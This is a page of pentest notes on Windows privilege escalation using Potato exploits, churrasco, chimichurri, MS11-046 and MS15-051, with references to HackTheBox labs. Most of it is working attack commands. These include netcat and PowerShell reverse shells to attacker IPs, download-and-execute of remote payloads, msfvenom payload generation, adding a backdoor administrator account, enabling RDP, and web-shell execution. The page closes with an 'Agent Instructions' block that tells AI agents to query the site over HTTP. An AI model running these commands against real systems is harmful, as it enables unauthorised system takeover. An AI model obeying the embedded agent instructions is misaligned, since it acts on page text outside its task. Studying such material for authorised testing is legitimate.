# 4 Kernel Exploits
| Family | | Versions |
| ------------- | --------------------- | --------------------------------------------------------------------------------------------------- |
| Rogue Potato | Latest Version | SHOULD work on Windows 10 |
| Juicy Potato | Upgrade of Rotten | Server 2008 R2 - No Hotfixes
Windows 7 Enterprise 6.1.7600
Patched in Latest Win-10
|
| Rotten Potato | Old | Year: 2016 |
| Churrasco | Non-Potato | |
| Chimichurri | Non-Potato : MS10-059 | |
## Basics
*
* [GitlabPotatoesWindowsPrivEsc](https://jlajara.gitlab.io/others/2020/11/22/Potatoes_Windows_Privesc.html)
## Required for Potato:
```
> whoami
Local Service
> whoami /priv
SeImpersonatePrivilege ..Enabled
```
## Token Impersonations
Service Accounts\
Cant login with them, but can escalate them
## Rogue Potato
*
* (compiled)
*
```
> RoguePotato.exe -r 10.x.x.x -l 9999 -e "C:\PrivEsc\reverse.exe"
> nc -nvlp 9999
```
## Juicy Potato \*\*BEST\*\*
* Token Impersonation
*
* [http://ohpe.it/juicy-potato/CLSID](http://ohpe.it/juicy-potato/CLSID/) (or powershell script)
*
```
whoami /priv ..SeImpersonatePrivilege = JuicyPotato
JuicyPotato.exe -l 5555 -p C:\PrivEsc\reverse.exe -t * -c GUID_CLSID
Juicy.Potato.x86.exe -l 5555 -p "C:\inetpub\wwwroot\shell.exe" -t * -c {F087771F-D74F-4C1A-BB8A-E16ACA9124EA}
JuicyPotato.exe -l 5555 -p c:\Windows\system32\cmd.exe -a "/c C:\intepub\drupal-7.54\nc.exe -e cmd.exe 10.x.x.x 4555" -t *
JuicyPotato.exe -l 5555 -p c:\Windows\system32\cmd.exe -a "/c C:\intepub\drupal-7.54\nc.exe -e cmd.exe 10.x.x.x 4555" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
nc -nvlp 5555
whoami ..system
```
## Juicy Potato + Powershell
* Reverse Shell with Admin
* JP will use Elevated Powershell to grab/exe reverse-ps1-shell
*
* REF: ArcticHTB
```
> cp /opt/JuicyPotato.exe jp.exe
> cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 revshell.ps1
> vim revshell.ps1
Add this to the end of the file:
Invoke-PowerShellTcp -Reverse -IPAddress $IP -Port 7600
> sudo impacket-smbserver kali .
> copy \\10.10.14.34\kali\jp.exe .
> jp.exe -t * -p C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -l 9001 -a "-c IEX(new-object net.webclient).downloadstring('http://$IP:9090/revshell.ps1')" -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
> nc -lvnp 7600
> whoami ..system!!
```
## Rotten Potato
Exploit from 2016\
Service Accounts could get System tickets and Impersonate
## churrasco
* REF: GrannyHTB GrandpaHTB
*
* Token impersonation via churrasco
* To escalate privs to System - developed by Cesar Cerrudo.
* Server 2003 allows Network Service and Local Service to impersonate 'System'
* Patched by Microsoft in Windows 2012 (MS09-12).
* On newer systems Juicy Potato works fine.
* But on older systems, token impersonation is abused via the churrasco exploit.
* If you have access to a box as `nt authority\network service`
* IE: You managed to upload ASP.NET shell
* You can easily elevate your privileges on the box.
* You can download the exploit [**here**](https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6705.zip) and compile by yourself
* or you can use the one from `sqlninja` which is located at `/usr/share/sqlninja/apps/churrasco.exe`
* It’s used by `sqlninja` in cases when we bruteforced `sa` password.
* After uploading you can easily
* Elevate your privileges.
* Create an Admin account
```
------------------------
Share from Kali/smb:
locate churrasco.exe
wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
cp /usr/share/sqlninja/apps/churrasco.exe /tmp
cp /usr/share/sqlninja/apps/nc.exe /tmp
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.98 RPORT=5555 -f exe > /tmp/venomshell.exe
locate smbserver.py
cd /usr/share/doc/python3-impacket/examples/
sudo python3 smbserver.py share /tmp
nc -nvlp 5555
------------------------
Windows:
whoami /priv ..SeImpersonatePrivilege - Yes!
systeminfo ..Server 2003 - Yes!
cd C:\Windows\Temp
copy \\10.x.x.x\share\nc.exe .
copy \\10.x.x.x\share\venomshell.exe .
copy \\10.x.x.x\share\churrasco.exe .
> \\10.x.x.x\share\churrasco.exe -d whoami
> churrasco -d "net user /add "
> churrasco -d "net localgroup administrators /add"
> churrasco -d "net localgroup "Remote Desktop Users" /add"
> churrasco.bin "net user oscp oscp /add && net localgroup Administrators oscp /add"
> churrasco -d "'reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fDenyTSConnections /t REG_DWORD /d 0 /f"
linux> rdesktop -u oscp -p oscp 10.x.x.x
> churrasco.exe -d venomshell.exe
> churrasco.exe -d "C:\Windows\Temp\nc.exe 10.x.x.x 5555 -e cmd.exe"
> \\10.x.x.x\share\churrasco.exe -d "C:\Windows\Temp\nc.exe 10.x.x.x 5555 -e cmd.exe"
```
## chimichurri
* MS10-059
* Found with [WindowsExploitSuggester](/07-win-privesc/win-enum.md#windows-exploit-suggester)
* Server 2008 R2 Datacenter 6.1.7600 N/A Build 7600 No Patch 64bit
* github/Re4son ..other blog:
```
cd /opt
git clone https://github.com/egre55/windows-kernel-exploits
cd windows-kernel-exploits/MS10–059: Chimichurri/Compiled
cp Chimichurri.exe .
pythom -m SimpleHTTPServer 4444
cd C:\ColdFusion8\ or:
cd C:\Windows\Temp
echo $webclient = New-Object System.Net.WebClient >wget.ps1
echo $url = "http://$MyIP:4444/Chimichurri.exe" >>wget.ps1
echo $file = "Chimichurri.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInterative -NoProfile -File wget.ps1
Chimichurri.exe 10.10.14.xx 5555
nc -nvlp 5555
connected ..system!!
----------
or:
cd /usr/share/doc/python3-impacket/examples
sudo python3 ./smbserver.py share /tmp
nc -nvlp 5555
cd C:\Windows\Temp\
copy \\$MyIP\share\Chimichurri.exe .
Chimichurri.exe $MyIP 5555
system!!
----------
chimichurri.exe $MyIP 5555
nc -nvlp 5555
system!
```
## MS11-046 (AFD PrivEsc)
* The Ancillary Function Driver (AFD) in afd.sys does not properly validate user-mode input which allows local users to elevate privileges.
* ms11-046.exe 6.1.7600 Build 7600 - for 32bit only
*
```
https://github.com/abatchy17/WindowsExploits
https://github.com/abatchy17/WindowsExploits/blob/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS11-046/MS11-046.exe
smbserver.py share
\\10.10.14.34\share\MS11-046.exe
whoami ..system!
https://github.com/rasta-mouse/Watson
or
Download from:
https://www.exploit-db.com/exploits/40564
Compile:
apt install mingw-w64 ..if not installed
i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32
python -m SimpleHTTPServer 8080
wget and curl are not installed on the machine however powershell is.
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.x.x.x:8080/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"
whoami ..system!
```
## MS15-051
* REF: [DrupalPhpVuln](/04-webapps/drupal.md#serialization-vulnerability-41564-php)
```
MS15-051 privesc
github/hfiref0x ..compiled Taihou64.exe (firefox thought virus)
github/SecWiki ..MS15-051 ..compiled ..zipped ..download
cp ms15-051x64.exe .
http://10.x.x.x/ippsec.php?fupload=ms15-051x64.exe&fexec=ms15-051x64.exe whoami
system!
http://10.x.x.x/ippsec.php?fupload=ms15-051x64.exe&fexec=ms15-051x64.exe "nc64.exe -e 10.x.x.x 5555"
nc -nvlp 5555
system!
Bonus PrivEsc:
ms15–051x64.exe whoami ..easy
```
## Send and Execute
* Execute files from UNC shares
* Ex: [DrupalPhpVuln](/04-webapps/drupal.md#serialization-vulnerability-41564-php)
```
impacket-smbserver share `myfolder`
http://10.x.x.x/ippsec.php?fexe=\\10.x.x.x\share\privesc.exe whoami
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://pentest.mxhx.org/07-win-privesc/win-kernelexp.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.